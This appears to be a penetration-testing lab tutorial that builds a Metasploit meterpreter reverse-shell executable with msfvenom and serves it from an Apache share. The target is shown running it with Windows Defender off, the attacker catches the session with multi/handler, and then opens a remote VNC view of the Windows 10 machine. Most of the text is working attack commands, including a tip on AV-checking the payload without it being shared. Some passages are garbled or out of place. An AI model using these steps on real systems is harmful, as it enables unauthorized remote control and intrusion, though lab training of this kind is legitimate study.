Attackers use client-side vulnerabilities to exploit unpatched software, thereby attaining access to the machine on which the software is installed.
VNC enables attackers to remotely access and control computers targeted from another computer or mobile device, wherever they are in the world. At the same time, it is also used by administrator and organizations throughout every industry sector for a range of different scenarios and use cases, including providing IT desktop support to colleagues and friends, and accessing systems and services on the move.
- How to exploit client-side vulnerabilities and establish a VNC session.
- Kali Linux virtual machine (Attacker).
- Windows 10 virtual machine (Target).
Launch Kali Linux and open the Terminal window and type:
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=10.0.2.42 LPORT=444 -o /root/Desktop/Test.exe
Note: LHOST is the IP address of your Kali machine.
This command will generate Test.exe, a malicious file on Desktop as shown in below:
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: /root/Desktop/Test.exe
You can also try this by using the msfconsole.
To check the malicious file that you created, go to https://nodistribute.com/ or https://antiscan.me and upload the file:
This site will perform a scan over 20 AV softwares databases. Do not upload your backdoors or any file to virusTotal.
Now create a directory to share this file with the target machine provide the permissions and copy the file from Desktop to shared location:
Create a directory on html folder:
mkdir /var/www/html/share/
Change the mode for the share to 755:
chmod -R 755 /var/www/html/share/
Change the ownership of that folder to www-data:
chown -R www-data:www-data /var/www/html/share/
Now copy the malicious file to the shared location:
cp /root/Desktop/Test.exe /var/www/html/share/
Next, start the apache service:
service apache2 start
Open a new terminal window and type msfconsole to launch Metasploit Framework.
Use the multi/handler to capture the session.
In msfconsole:
use multi/handlerset payload windows/meterpreter/reverse_tcp- set the
LHOSTto your Kali IP address andLPORTto 444 runthe exploit
A reverse shell (also known as a connect-back) is the exact opposite: it requires the attacker to set up a listener first on his box, the target machine acts as a client connecting to that listener, and then finally the attacker receives the shell.
This module exploits memory corruption vulnerability within Microsoft's HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused.
Remember to deactivate all Windows Defender parameters.
Launch the browser and type the IP address of the Kali machine that are running apache webserver and download the Test.exe.
In my case is http://10.0.2.42/share
Double click Test.exe.
You will get a Security Warning window, click run.
Switch to Kali Linux machine and check if there is any session that are opened in the Meterpreter Shell as shown below:
Meterpreter is a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code.
Useful commands: https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/
About Meterpreter: https://doubleoctopus.com/security-wiki/threats-and-tools/meterpreter/
Now, you can create a VNC session on Windows 10 machine remotely by typing:
run vnc
This command will open a VNC session of the Target's machine as shown below:
Useful links: